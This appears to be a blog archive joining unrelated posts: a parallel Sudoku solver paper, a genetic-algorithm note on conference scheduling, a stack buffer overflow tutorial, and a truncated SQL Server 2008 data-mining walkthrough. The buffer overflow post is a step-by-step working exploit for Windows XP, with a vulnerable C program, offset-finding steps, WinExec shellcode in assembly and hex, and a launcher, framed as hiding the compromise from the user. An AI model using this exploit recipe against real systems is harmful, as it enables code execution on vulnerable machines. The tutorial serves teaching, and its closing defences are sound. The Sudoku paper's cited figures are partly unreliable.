Ali Tarhini, Hazem Hajj

Department of Electrical and Computer Engineering

American University of Beirut

Beirut, Lebanon

{aat16, hh63}@aub.edu.lb

 

 

Abstract—Sudoku is a complex yet exciting game. It is a 9 by 9 matrix divided to sub grids of size 3. The goal of the game is to fill in all the cells with numbers from 1 to 9 such that no two cells on the same row, column or minigrid have the same number. This problem can be generalized for larger size and the computational complexity to find a solution for Sudoku is high. In this paper, we propose a new parallel algorithm solver for the generalized NxN Sudoku grid that exploits the manycore architecture. Our test results show that the algorithm scales well as the number of cores grow.

 

INTRODUCTION

 

Sudoku is a complex yet exciting game. It is a 9 by 9 matrix divided to sub grids of size 3. The goal of the game is to fill in all the cells with numbers from 1 to 9 such that no two cells on the same row, column or minigrid have the same number. This problem can be generalized for larger size and the computational complexity to find a solution for Sudoku is high. A Sudoku puzzle usually comes with a partially filled grid. The aim is to complete the grid in the shortest amount of time.

From a mathematical perspective, it has been proven that the total number of valid Sudoku puzzles is equal to 6, 670, 903, 752, 021,072,936,960 or
approximately 6.671×1021 [1].

Trying to populate all these grids is itself a difficult problem because of the huge number of possibilities and combinations of puzzles, Assuming each solution takes 1 micro second to be found, then with a simple calculation we can determine that it takes 211,532,970,320.3 years to find all possible solutions. If that number was small, say 1000, it would be very easy to write a Soduku solver application that can solve a given puzzle in short amount of time. The program would simply enumerate all the 1000 puzzles and compares the given puzzle with the enumerated ones and we don’t have to design a parallel algorithm for finding Sudoku solutions. Unfortunately, this is not the case since the actual number of possible valid grids is extremely large so it’s not possible to enumerate all the possible solutions. This large number also directly eliminates the possibility of solving the puzzle with brute force technique in a reasonable amount of time. Therefore, a method for solving the puzzle quickly will be derived that takes advantage of manycore architecture on modern and future computer systems which will bring down the time cost of solving an NxN Sudoku to a reasonable amount? Our goal is to allow for the algorithm to take advantage of the manycore architecture to further reduce its running time. This is very important and is at the heart of our work because for large N, the number of cells per row and column in the Sudoku grid, finding a solution becomes an extremely difficult and computationally intensive problem. Hence, the parallel algorithm must also scale as the grid size increases.

 

RELATED WORK

 

Many algorithms have been developed to solve the Sudoku problem. One of these developed algorithms is the simulated annealing algorithm [1]. The Simulated annealing algorithm works by first randomly filling all the blank cells then it checks if the same number is repeated twice in the same row or same column. If there’s a repeated number then it swaps this value with another and repeats checking for repeated values. The simulated annealing algorithm consumes much time to solve the puzzle and it is only applicable to easy Sudoku problems. Another proposed algorithm to solve the Sudoku puzzle follows the linear system approach [6]. The algorithm converts the puzzle into a number of liner equations and tries to solve them. There are many rules that we should keep in mind while transforming the Sudoku puzzle into a system of linear equations. These constraints are:

  1. There shouldn’t be any repeated value in the same row of a Sudoku puzzle.
  2. There shouldn’t be any repeated value in the same column of a Sudoku puzzle.
  3. There shouldn’t be any repeated value in the same 3*3 square of a Sudoku puzzle.
  4. All the numbers should be from 1 to 9.
  5. We must fill all the blank cells.

It is hard to solve the system for hard puzzles. This algorithm is only applicable for relatively easy Sudoku puzzles.

Artificial Bee Colony algorithm was invented recently to solve the Sudoku problem [3]. This algorithm has this name because it imitates the work done by the bees. The bees are divided into two sets, one set performs the real work while the other set supervises their work and receive information from them and based on that information they make decisions. In a similar way this algorithm tries to solve the Sudoku puzzle by following a parallel search approach where multiple blank cells can be filled while other cells would wait to receive information if those chosen cells values fit in that cells, and based on that they fill their values accordingly. Another approach for solving the Sudoku problem is by implementing the SAC algorithm [4]. This algorithm works by first assigning a set of potential values for every blank cell. Each cell has 9 optional values to choose from. The algorithm starts by choosing one of these potential values and assigning them to the cell and proceeds to other cells. If any rule is broken, the algorithm rolls back deletes this value from the set of potential values of the cell and chooses another value from the cell’s optional values. This algorithm follows a parallel approach to speed up solving the Sudoku problem, by allowing two cells to work in parallel for finding their correct values.

 

PROPOSED METHOD

 

Our algorithm follows a depth first search approach with backtracking. However, backtracking on manycore is not an easy task since each core is processing a path independent of the other cores so it’s hard to determine what was the previous step and backtrack to it. We also need to determine the granularity of a task or a work item, that is, the smallest unit of work done by any core because each core will be handling a work item at any point during the running time of the algorithm. Defining the granularity clearly shows whether each work item is dependent on other work items or that it is totally independent. In this case, the work item is not dependant of previous inputs and does not require any kind of inputs from other cores in order to be processed.

 

Consider a work item to be the operation of setting a value of one cell in an NxN grid. Therefore, the problem space is N2 work items if the cells that initially have values already set are excluded. We will also define the operation LOCK which denotes a locking mechanism for the cell whose value is about to be changed. However, a problem arises when two cores attempt to update two different cells on the same row, on the same column or within the same minigrid. For example, if these two cells had only two possible values, when both cores take a lock over the cells, there is a probability that both cores assign the same value to the cells. Hence, the locking operation is not capable of resolving this issue and needs to be modified. The proposed algorithm works around this problem by defining LOCK as an operation that takes a lock over the entire row, column and minigrid so no other core could lock any cell within the same area. This area is referred to as the conflict boundary of a cell. The shaded area in Figure1 shows the conflict boundary (locked area) for the cell C(2,3) or C(2nd row, 3rd column).

 

The algorithm starts by splitting the work items equally among available cores. Given N cores and n2 work items, where N is the number of core and n is the width of the square grid, and to distribute the loads equally across the cores, each core is assigned n2/N work items. Each core will determine the set of possible values for each of its cells and store these possible values. Then, each core will sort the work items in ascending order according to the smallest set of possible values for each cell so that the cells that have least possible values will be processed first. This is a good heuristic because most likely there will be cells that have only one possible value and that can be directly set thus reducing the problem space and eliminating unneeded computations. It is also important even if the cell had two possible options because the algorithm will randomly pick one of the two values by random and assign it to the cell. The probability of choosing the wrong value here is 0.5 which is much better than if there were, for example, 4 possible values left for a cell that the algorithm had to choose from. In that case, the probability of choosing a wrong value is ¾ assuming the cell has only one correct answer.

 


Figure 1 The shaded area represents the locked region which is the conflict boundary required to be locked in order to update cell C(2,3).

Once the work items are assigned, the cores are ready to start processing their work items. A core P will pull a work item from its local queue, check its set of possible value and randomly pick one value and assign it to the cell after taking a lock on the cell’s conflict boundary. If P is unable to take a lock due to another core already locking another cell on the same conflict boundary, the work item is not processed and the work item is enqueued again while another work item is dequeued and processed. This process reduces the idle time for P since it eliminates the need for waiting until the other core releases its lock on the conflict boundary and allows P to process another work item hence maximizing the overall efficiency of the algorithm.

 

One problem remains when a core tries to set a value for a cell but does not find a value because the cell has no more possible values, meaning that the current values in all the cells in the grid yielded an invalid Sudoku puzzle. The core has to backtrack to a previous state and take another branch. Here, the state of the puzzle is defined as a stable instance of it, that is, a puzzle that could be solved and is not yet determined as unsolvable. In that case, a message is sent to the N-1 cores to stop processing any work items while P retrieves the previous puzzle from its local stack and distributes the new work items of that puzzle to the N-1 cores. Once, all cores receive their work items, P will try to set a value for the cell that previously had no solution. When it sets a value, P sends another message to the N-1 core indicating they may proceed in processing more work items if they are waiting. The algorithm terminates when there are no more work items to be processed.

 

TESTING AND RESULTS

 

The proposed algorithm is tested on an 8 core machine with 4 GB of physical memory on a windows based operating system. First the sequential version of the algorithm is run and it utilized, as expected, only one of the available cores. The sequential algorithm was given a partially filled Sudoku grid and the running time took 0.78 seconds for the 9 by 9 Sudoku. Then the parallel version of the proposed algorithm is run on the same puzzle. Monitoring the Task Manager in windows, we noticed the full utilization of all the cores as in the figure shown below. The overall running time of the algorithm took an average of 0.11 seconds of five repeated executions.

 


Figure 2 Utilization of all available cores by the parallel algorithm.

 

CONCLUSION

 

In this paper, we proposed a new parallel algorithm for solving an NxN Sudoku grid. The algorithm is designed to maximize the utilization of all cores available on the system. Testing and results section that show the efficiency of the algorithm and that it utilized all the available cores on the system. Future work for this algorithm will be testing it for manycore architecture and verifying if it will scale on manycore as it did on multicore.

 

REFERENCES

 

[1]
“An FPGA-Based Sudoku Solver based on Simulated Annealing Methods”. Pavlos Malakonakis, Miltiadis Smerdis, Euripides Sotiriades, Apostolos Dollas International Conference on Field-Programmable Technology, 2009. FPT 2009.

 

[2] “Linear Systems, Sparse Solutions, and Sudoku”. Prabhu Babu, Kristiaan Pelckmans, Petre Stoica, Fellow, IEEE, and Jian Li, Fellow, IEEE. Signal Processing Letters, IEEE.

 

[3] “Artificial Bee Colony (ABC), Harmony Search and Bees Algorithms on Numerical Optimization” .D. Karaboga, B. Akay. Erciyes University, The Dept. of Computer Engineering, 38039, Melikgazi, Kayseri, Turkiye.

 

[4] “Coordinating Data Parallel SAC Programs with S-Net”. Clemens Grelck, Sven-Bodo Scholz, and Alex Shafarenko. Parallel and Distributed Processing Symposium, 2007. IPDPS 2007. IEEE International

 

[5] Bertram Felgenhauer, “Enumerating possible Sudoku grids”.

 

[6] S.F.Bammel, J.Rothstein, The number of 9×9 Latin squares, Discrete Mathematics 11 (1975) 93–95.

Genetic Algorithm for Conference Schedule Mining

Genetic Algorithm for Conference Schedule Mining

Ali Tarhini

 

Problem Definition:

Scheduling sessions, also known as “time tabling” at a large conference is a persistent challenge. The problem states that given a large number of sessions, rooms, time slots and a set of constraints, it is required to mine for the best schedule that covers all sessions within the given time slots while satisfying the required set of constraints. Allocating sessions to specific “time slots” requires advanced computational techniques for finding the best schedule that satisfies most of the constraints. The problem with large conferences is that many sessions will be scheduled to run concurrently; therefore an attendant may run into a problem if two or more of his/her favorite sessions are scheduled to run at the same time. Although there have been efforts to tackle the problem by using “tracks” to categorize sessions, which basically assumes that an attendant will stick to one track where the sessions of a track are scheduled sequentially in time. It turned out that this solution is not efficient in practice because attendants tend to hop from one track to the other rather than following a strict schedule for one track. More advanced approaches reduce the problem to the Job Shop Scheduling problem (JSSP) with multiple precedence constraints which is an optimization problem composed of resources, operations, and constraints. A job consists of a sequence of operations with each operation is part of exactly one job. Each operation is executed on a resource with starting time during a processing time with precedence constraints. A job has a release date, completion time and due date. A resource can execute only one operation at a time. We assume that any successive operations of the same job are going to be processed on different machines. It is desired to find a feasible schedule, which optimizes a set of given performance measures. However, JSSP problems tend to be theoretical and are not feasible to be applied in practice for international conferences because the algorithm does not take into account human interest in a particular set of sessions. For example, JSSP cannot handle attendant’s favorite sessions because this is not a constraint, it’s a training set. In this paper, a genetic algorithm is presented to provide a solution for the conference scheduling problem. In the context of genetic algorithms, a class of approximation algorithms, our “solution” means one among a set of all possible “best” solutions. It may not be the “best possible solution” but is certainly among the best.

Proposed algorithm:

Input: Sessions, Rooms, Timeslots, set of preference sessions.

As any genetic algorithm, this approach utilizes the genetic property “survival of the fittest” which means that as solutions are getting generated, bad solutions are eliminated and good solutions are carried over to the next step. In order to determine what’s good and what’s bad, a Fitness function is used. This function validates a given solution with the set of constraints and list of preference sessions and returns a value indicating how relevant the solution is. The fitness function also takes into consideration the training set of favorite sessions recommended by attendants and tries to optimize the fitness according to how well each solution is close to any of the favorite choices.

A solution is simply a set of associations of a session to room and a timeslot.

The algorithm starts by generating solutions at random, that is, by randomly picking a session and assigning it to a room and a timeslot. The session is then removed from the input and the selected room/timeslot is also removed from the list of remaining rooms/timeslots. This is to eliminate the possibility of assigning the same session twice. Hence, the probability of coming up with solutions that are at least worth considering is optimized. We will denote the set of generated solutions as generation 0; the first generation. Next, each solution in generation 0 is applied to the Fitness function which compares the solution against the set of constraints and returns a value indicating relevance. Once all solutions are evaluated, they are sorted in descending order(assuming lower value indicates better solution) and the top X percentage of the solutions is chosen to be carried on to the next generation. Kill all the remaining solutions. The surviving solutions will undergo two operations in order to compute the next generation. Mutation and Crossover. In mutating a solution, one association of a session to a room/timeslot is selected and the session is changed to a different session that is not already listed in the solution. In crossover, two solutions are picked at random and sessions are exchanged in between. This procedure is repeated over many generations until a solution that meets most of the constraints is met.

 

References:

[1] Wayne Smith, Applying Data Mining To Scheduling Courses at a University, School of Information Systems and Technology Claremont Graduate University

This study demonstrates the feasibility of applying the principles of data mining. Specifically it uses association rules to evaluate a nonstandard (“aberrant”) timetabling pilot study undertaken in one College at a University. The results indicate that inductive methods are indeed applicable, and that both summary and detailed results can be understood by key decision-makers, and, straightforward, repeatable SQL queries can be used as the chief analytical technique on a recurring basis. In addition, this study was one of the first empirical studies to provide an accurate measure of the discernable, but negligible, scheduling exclusionary effects that may impact course availability and diversity negatively.

[2] Atif Shahzad Nasser Mebarki Discovering Dispatching Rules For Job Shop Scheduling Problem Through Data Mining

A data mining based approach to discover previously unknown priority dispatching rules for job shop scheduling problem is presented. This approach is based upon seeking the knowledge that is assumed to be embedded in the efficient solutions provided by the optimization module built using tabu search. The objective is to discover the scheduling concepts using data mining and to obtain a rule-set capable of approximating the efficient solutions in a dynamic job shop scheduling environment. A data mining based scheduling framework is presented which consists of 3 phases: Search for a set of solutions, Apply data cleaning and for the resulting solutions including aggregation and attribute construction and the finally to model induction and interpretation by applying decision tree induction algorithm.

[3] Ahmed Hamdi Abu Absa, Sana’a Wafa Al-Sayegh, E-Learning Timetale Generator Using Genetic Algorithms

 

In this paper, the authors explain the details of the implementation of a computer program which employs Genetic Algorithms (GAs) in the quest for an optimal lecture timetable generator. GA theory is covered with emphasis on less fully encoded systems employing nongenetic operators. The field of Automated Timetabling is also explored. A timetable is explained as, essentially, a schedule with constraints placed upon it. The program, written in java, has the special libraries to deal with genetic algorithm which are used for the implementation. In a simplified university timetable problem it consistently evolves constraint violation free timetables. The effects of altered mutation rate and population size are tested. It is seen that the GA could be improved by the further incorporation of repair strategies, and is readily scalable to the complete timetabling problem.

 

[4] Branimir Sigl, Marin Golub, Vedran Mornar, Solving Timetable Scheduling Problem

Using Genetic Algorithms

 

In this paper a genetic algorithm for solving timetable scheduling problem is described. The algorithm was tested on small and large instances of the problem. Algorithm performance was significantly enhanced with modification of basic genetic operators. Intelligent operators restrain the creation of new conflicts in the individual and improve overall algorithm ‘s behavior.
The program uses eliminating selection, which chooses and eliminates bad individuals from the current population, making room for new children that will be born from the remaining individuals. The probability of elimination increases proportionally with the fitness value of the individual. As the remaining individuals are better than the average of the population, it is expected that their children will be better as well. There is some probability (though very small) that eliminating selection deletes the best individual. That would ruin the algorithm efforts and put its work back for some number of generations. Therefore, protection mechanism for best individuals has to be made, so the good genetic material is sustained in population. It is called the elitism. The authors’ choice was to keep just the top one individual. The reproduction operators constitute

Exploit the buffer – Buffer Overflow Attack

Exploit the buffer – Buffer Overflow Attack

Theoretical Introduction:

A program is a set of instructions that aims to perform a specific task. In order to run any program, the source code must first be translated into machine code. The compiler translates high level language into low level language whose output is an executable file. In order to simplify the machine code representation to the user it is displayed in hexadecimal format. The executable file is then run in memory which is divided into two parts which are the text part and the data part [1]. In memory, the machine code of a program is loaded into the memory text part which is a read only area and can’t be changed [1]. If the program contains any static variables such as the global variables or constants, then these static variables are stored in a part of memory called the static data [1]. Then during the program runtime the instructions are allocated in memory on either the heap or the stack depending on the type of memory allocation used to allocate the variables (by value or by reference). This process of memory allocation for the text memory part followed by the static data part followed by the stack or heap is done from lower to higher memory addresses [1]. The heap grows from lower to higher memory addresses whereas in the stack data is allocated from higher to lower memory based on the concept of Last in First out (LIFO) where the last element that enters the stack is the first one to go out (Fig.1) [1]. The stack is a continuous space in memory where the information about any running function is stored which can be either data or addresses.

Figure 1

For example, assume we have the following program [2]:


void fn1() {

 

char buffer1[5];

 

char buffer2[10];

 

}

 

void main() {

 

fn1();

 

}

 

By looking at the assembly language output we see that the call to fn1() is translated to:

 

push %ebp

 

mov %esp,%ebp

 

sub $20,%esp

The stack allocation of the above program is shown below:

High Memory

Return address of main

EBP

Buffer1

Buffer1

Buffer2

Buffer2

Low Memory

Buffer2

The ESP, EBP and EIP registers are 32 bit cpu registers. The ESP register (stack pointer) always points to the top of the stack where the last element in the stack is stored (the lowest memory address). The EBP register (base pointer) is used to point to the current frame pointer which corresponds to a call to a function that hasn’t returned yet. The EIP register contains the address of the next instruction to be executed.

Each time a function is called the address of the next instruction following the call is pushed into the stack, this value is obtained from the EIP register of the cpu. The return address is stored in the stack in order to return back correctly to the next instruction following the function call. After pushing the EIP value, the EBP value obtained from the EBP register of the cpu is pushed into the stack which corresponds to a new frame pointer for the currently called function. The ESP register always points to the top of the stack. Memory is always allocated in blocks of word size that’s why buffer1 is allocated 8 bytes instead of 5 and buffer2 is allocated 12 bytes instead of 10 [2].

Hackers can utilize the vulnerability of having the return address stored in the stack and try to overflow the buffer by entering data larger than its allocated size in the stack by taking advantage of the lack of boundary checking of C or C++ code for some instructions. The instructions that lack boundary checking include: gets(), strcpy(), strcat(), sprintf(), vsprintf(), scanf(), sscanf(), fscanf(),… [3]

Buffer flow vulnerabilities have been increasing recently [1]. Attackers who exploit the buffer overflow vulnerability take the advantage of the presence of the return address of a running function in the stack and try to change this return address in order to execute any executable file they choose or simply crash the system. This can be achieved by overflowing the buffer with data larger than its size until reaching the location of the return address in the stack. This return address can be overwritten by the address of a malicious code causing the program to execute this malicious code instead of returning to the main. The return address can also be written by any data causing the program to jump to an unidentifiable address and thus causing a segmentation error and causing the program to crash [4].

Brief Outline of the Steps

The hacker trying to achieve a buffer overflow should undergo the following steps:

  1. He should identify the existence of buffer overflow vulnerability. When a user enters a long string of characters as an input to a program and the program displays access violation error then this program is identified as having buffer overflow vulnerability and now the hacker can use this program as its target to execute malicious code.
  2. He should identify the location of return address inside the stack. Identifying the buffer size is not sufficient enough to identify the return address location in the stack because there is sometimes an unidentified number of junk between the ebp and the eip values stored in the stack. The return address location is found by performing a brute force where a long string of distinct characters are entered as an input (each character is repeated four times so that it occupies one word location e.g., AAAABBBBCCCCDDDD), and ollydbg is used to identify which character of the above entered characters is stored in the return address and thus the location of the return address is identified.
  3. He should find the shellcode of the code he wants to execute. This shellcode is entered as input into the vulnerable program where nops (no operation) are used in case the shellcode doesn’t fill the entire buffer. Ollydbg is then used to identify the address of this shellcode.
  4. He should write and run the program function that will execute the vulnerable code containing buffer overflow where the shellcode is written into the buffer and Nops are added if there are additional unfilled bytes in the buffer, and the address of the start of the buffer is placed into the return address in the stack.

List of Machines and Software Used

  • Windows xp sp2
  • Microsoft visual studio framework(Buffer security check turned off)
  • C or C++ code containing at least one of the buffer overflow vulnerable instructions.
  • Ollydbg

Attack Explained

  1. Write the following C application which simply copies an input string into a buffer of size 49 bytes:

#include <stdio.h>

#include <stdlib.h>

#include <conio.h>

#include <string.h>

int fn1(char *str){

    char local[49];

    strcpy(local,str);

return 0;

}

int main(int argc,char * args[]){

fn1(args[1]);

return 0;

}

  1. Call the program by passing input string of size less than 49 characters, the program executes normally:

    Open cmd and type buffer.exe AAAABBBBCCCC

  1. Try to discover the presence of the buffer overflow vulnerability in the C code by passing a large string parameter.

Open cmd and type:

buffer.exe AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO

Since this program displayed an error when we enter a long string of characters as an input, then this program is identified as containing the buffer overflow vulnerability and can now be used as our target to execute shellcode. The program has the buffer overflow vulnerability because it uses the strcpy instruction which copies the input instruction into a string of size 49 characters. So if we enter a string having size larger than 49 characters, the stack will be corrupted because the return address saved in the stack is overwritten with an address from the string that is an unidentifiable address. Hackers can now exploit this vulnerability by entering a large string that overwrites the return address with the address of their malicious code.

  1. Try to identify the location of the return address in the stack.
    1. open buffer.exe using the ollydbg and pass the following long string parameter:

      AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ

      Each character is repeated 4 times so that each letter occupies a word size memory location.

    2. Keep on pressing run until reaching the return instruction. Press run and check the value of EIP in the registers panel:

    3. The value of EIP is 4F4F4F4F which is the hexadecimal representation of OOOO.

We conclude that the return address is located 56 characters from the beginning of the input string:

52 bytes are reserved in the stack for the buffer of size 49. This buffer reserved 52 bytes instead of 49 bytes because memory is allocated in terms of word size which is 4 bytes.

The following 4 bytes are reserved for the value of the ebp register.

After 56 bytes from the string start the return address which is the value of the eip register is found. The stack looks like the following:

OOOO (place of the Return address which is the value of EIP)
NNNN ( EBP)
MMMM
LLLL
KKKK
JJJJ
IIII
HHHH
GGGG
FFFF
EEEE
DDDD
CCCC
BBBB
AAAA

So now any 4 bytes we place after the following string

AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKLLLLMMMMNNNN (which will be replaced by shellcode) will replace the contents of the return address and the program will now jump to the entered address in the return address location instead of returning back to the main.

  1. Now that we have identified the location of the return address we need to write our shellcode that will run a calculator and call exit so that no error will be displayed to the user and he won’t know that his code has been exploited.

The steps are the following:

  1. Find the assembly code of WinExec and how it is called from the documentation of windows global _start
  2. _start:
  3. jmp short GetCommand
  4. CommandReturn:
  5.      pop ebx     ;ebx now holds the handle to the string
  6.      xor eax,eax
  7.      push eax
  8.      xor eax,eax     ;for some reason the registers can be very volatile, did this just in case
  9.      mov [ebx + 89],al     ;insert the NULL character
  10.      push ebx
  11.      mov ebx,0x758ee695
  12.      call ebx     ;call WinExec(path,showcode)
  13.      xor eax,eax     ;zero the register again, clears winexec retval
  14.      push eax
  15.      mov ebx, 0x758b2acf
  16.      call ebx     ;call ExitProcess(0);
  17. GetCommand:
  18.     ;the N at the end of the db will be replaced with a null character
  19.     call CommandReturn
  20.     db “calc.exe”

  21. Find the address of WinExec and ExitProcess using arwin tool. These addresses are different on every machine.


  1. Replace the old addresses of WinExec and ExitProcess in the assembly code with the new addresses found.

  2. Extract the assembly code and compile it to object code using nasm tool.


  1. Convert the object code to opcode using ld tool.


  1. Dump the shellcode using objdump tool.


Now we have found the shellcode of running a calculator followed by an exit which is the following:

\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53\xbb\x4d\x11\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xa2\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff\x63\x61\x6c\x63\x2e\x65\x78\x65

This shellcode will be written in place of the buffer and since the shellcode size is less than the buffer size we add nops (no operations) at the beginning of the buffer which won’t affect the code. The nop is represented by \x90.

  1. Now we need to find the address of the buffer because the shellcode is written in its place. To find this address we will use the ollydbg.
    1. Open buffer.exe using the ollydbg and pass the following parameter:

      AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQ

    2. Look into the stack place and scroll up to find the following pattern of hexadecimals :

      4141414142424242434343434444444445454545464646464747474748484848494949494A4A4A4A4B4B4B4B4C4C4C4C4D4D4D4D…


      The address of buffer is identified as 0013FF40 (the place of 41414141 which is the hexadecimal representation of AAAA). Now we know the address of the shellcode is 0013FF40 which is represented as \x40\xFF\x13. We avoid using the null character \x00 because it would terminate the string.

  2. Create the attack application which calls buffer.exe with our shellcode:

    #include <stdio.h>

    #include <windows.h>

    int main (){

    //the executable filename of the vulnerable app

    char xp[70]=”buffer.exe “;

    //Address of the shellcode

    char ret[]= “\x40\xFF\x13″;

    //the shellcode of calc.exe winxp followed by exit

    char of[] =

    “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53\xbb\x4d\x11\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xa2\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff\x63\x61\x6c\x63\x2e\x65\x78\x65″;

    // concatenated buffer.exe by the shellcode followed by the address of the shellcode

    strcat(xp,of);

    strcat(xp,ret);

    //execute the concatenated string

    WinExec(xp,0);

    return 0;

    }

    Note that few NOPS were added at the beginning of the shellcode in order to fill the buffer since the shellcode doesn’t fill it completely. The stack will look like the following:

\x40\xFF\x13
\x2e\x65\x78\x65
\x63\x61\x6c\x63
\xe0\xff\xff\xff
\x7c\xff\xd3\xe8
\xbb\xa2\xca\x81
\xd3\x31\xc0\x50
\x11\x86\x7c\xff
\x59\x53\xbb\x4d
\x31\xc0\x88\x43
\x5b\x31\xc0\x50
\x90\x90\xeb\x1b
\x90\x90\x90\x90
\x90\x90\x90\x90
\x90\x90\x90\x90
  1. Finally, execute the exploit:

The overflow has been successfully executed since the calculator has been run.

How to avoid Buffer overflows

  • Try to use different languages that can do bound checking other than C or C++. But if you’re writing a C or C++ code use instructions that perform bound checking. For example, instead of using the strcpy or strcat instructions use the strncat or the strncpy [1].
  • Try to write secure programs by writing additional code that can do bound checking [1].
  • You can use tools that can analyze the source code for any buffer overflow vulnerabilities [1].
  • Patch the system, since new systems have been developed taking buffer overflow into consideration to avoid it [1].
  • Set the buffer security check to positive in the properties of the running program in the visual studio framework. This will disable buffer overflow vulnerability from hacking the program and identifying the return address location.

References

[1] http://www.sans.org/reading_room/whitepapers/securecode/buffer-overflow-attack-mechanism-method-prevention_386

[2] http://insecure.org/stf/smashstack.html

[3] http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/buffer-overflow.html

[4] http://www.cs.umass.edu/~trekp/csc262/lectures/04c.pdf

[5] http://www.acsac.org/2005/papers/119.pdf

[6] http://isis.poly.edu/kulesh/stuff/etc/bo.pdf

[7] http://ieeexplore.ieee.org/Xplore/login.jsp?url=http%3A%2F%2Fieeexplore.ieee.org%2Fiel5%2F6658%2F17794%2F00821514.pdf%3Farnumber%3D821514&authDecision=-203


Data mining in Sql Server 2008 & Visual Studio

Architecture of Microsoft SQL S

Image via Wikipedia

Creating a Project in the Business Intelligence Development Studio

Follow these steps to create a new project. To start BIDS, click the Start button and go to All Programs->Microsoft SQL Server 2008->SQL Server Business Intelligence Development Studio. In BIDS, select File New Project. You will see the Business Intelligence Projects template. Click the Analysis Services Project template. Type “AnalysisServices2008Tutorial” as the project name and select the directory in which you want to create this project. Click OK to create the project.

The Solution Explorer Pane

The Solution Explorer contains the following:

1) Data source objects: They contain details of a connection to a data source, which include server name, catalog or database name, and login credentials. You establish connections to relational servers by creating a data source for each one.

2) Data Source Views: When working with a large operational data store you don’t always want to see all the tables in the database. With Data Source Views (DSVs), you can limit the number of visible tables by including only the tables that are relevant to your analysis.

3) Cubes: A collection of measure groups (from the fact tables) and a collection of dimensions form a cube. Each measure group is composed of a set of measures. Cubes can have more than three dimensions and not necessarily the three – dimensional objects as their name suggests.

4) Dimensions: They are the set of tables that are used for building the cube. Attributes that are needed for the analysis task are selected from each table.

5) Mining Structures: Data mining is the process of analyzing raw data using algorithms that help discover interesting patterns not typically found by ad – hoc analysis. Mining Structures are objects that hold information about a data set. A collection of mining models form a mining structure. Each mining model is built using a specific data mining algorithm and can be used for analyzing patterns in existing data or predicting new data values.

 

The Properties Pane

 

If you click an object in the Solution Explorer, the properties for that object appear in the Properties pane. Items that cannot be edited are grayed out. If you click a particular property, the description of that property appears in the Description pane at the bottom of the Properties pane.

 

 

 

Data mining in sql server 2008

 

The data mining process is regarded as a series of steps to be followed which include the following:

1) Creating a Data Source:

Cubes and dimensions of an Analysis Services database must retrieve their data values from tables in a relational data store. This data store, typically part of a data warehouse, must be defined as a data source.

To create a data source, follow these steps:

a) Select the Data Sources folder in the Solution Explorer.

b) Right – click the Data Sources folder and click New Data Source. This launches the Data Source Wizard.

c) In the data source wizard you will provide the connection information about the relational data source that contains the “Adventure Works DW 2008” database. Click the New button under Data Connection Properties to specify the connection details. You will enter here the server name, the database name, and choose one of the two authentication modes either sql server authentication or windows authentication.

d) In the Impersonation Information page you need to specify the impersonation details that Analysis Services will use to connect to the relational data source. There are four options. You can provide a domain username and password to impersonate or select the Analysis Service instance’s service account for connection. The option Use the credentials of the current user is primarily used for data mining where you retrieve data from the relational server for prediction. If you use the Inherit option, Analysis Services uses the impersonation information specified for the database.

e) On the final page, the Data Source Wizard chooses the relational database name you have selected as the name for the data source object you are creating. You can choose the default name specified or specify a new name here.

2) Creating a Data Source View ( DSV )

The Adventure Works DW database contains 25 tables. The cube you build in this chapter uses 10 tables. Data Source Views give you a logical view of the tables that will be used within your OLAP database.

To create a Data Source View, follow these steps:

a) Select the Data Source Views folder in the Solution Explorer.

b) Right – click Data Source Views and select New Data Source View. This launches the Data Source View Wizard.

c) In the data source view wizard you can select the tables and views that are needed for the Analysis Services database you are creating. Click the > button

so that the tables move to the Included Objects list. We will include in the data source view here the following set of tables:

FactInternetSales, FactResellerSales, DimProduct, DimReseller, DimPromotion, DimCurrency, DimEmployee, DimSalesTerritory, DimTime, DimCustomer, Dim Geography.

d) At the final page of the DSV Wizard you can specify your own name for the DSV object or use the default name. Specify the “Adventure Works DW” for the DSV Name in the wizard and click Finish.

If you open the data source view in the solution explorer the data source view editor opens which contains three main areas: Diagram Organizer, the Tables view, and the Diagram view. In the diagram view you can see a diagram of all the added tables with their relationships among each other. In the tables view you can see all the tables that are contained in this data source view. In the diagram organizer, you can right click in the pane here to create a new diagram and drag and drop the tables that u wish to add, or simply add any table u want then right click on it and choose add related tables, this will add all the related tables to the given chosen table. In order to add a new field to a given table, you simply right click on the table in the diagram view and choose add named reference, a dialog will appear where you can enter the name of the new field and the formula upon which it is derived. For example, to add a new field named FullName to the table employee, you write the following formula: FirstName + ‘ ‘ + MiddleName + ‘ ‘ + LastName.

There are different layouts in the data source view. You can switch between rectangular layout and diagonal layout in the DSV by right – clicking in the DSV Designer and selecting the layout type of your choice.

To see a sample of the data specified by your DSV, right – click a table in the DSV Designer and select Explore Data. The data presented is only a subset of the underlying table data. By default the first 5,000 rows are retrieved and shown within this window. You can change the number of rows retrieved by clicking the Sampling Options button. Clicking the Sampling Options button launches the Data Exploration Options dialog where you can change the sampling method, sample count, and number of states per chart, which is used for displaying data in the chart format.

When you click the Pivot Table tab you get an additional window called PivotTable Field List that shows all the columns of the table. You can drag and drop these columns inside the pivot table in the row, column, details, or filter areas. The values in the row and column provide you with an intersection point for which the detailed data is shown.

3) Creating New Dimensions

Dimensions help you define the structure of your cube so as to facilitate effective data analysis. Specifically, dimensions provide you with the capability of slicing data within a cube, and these dimensions can be built from one or more dimension tables.

a) Create the DimGeography dimension:

 Launch the Dimension Wizard by right – clicking Dimensions in the Solution Explorer and selecting New Dimension.

 In the Select Creation Method screen select the “Use an existing table” option and click next.

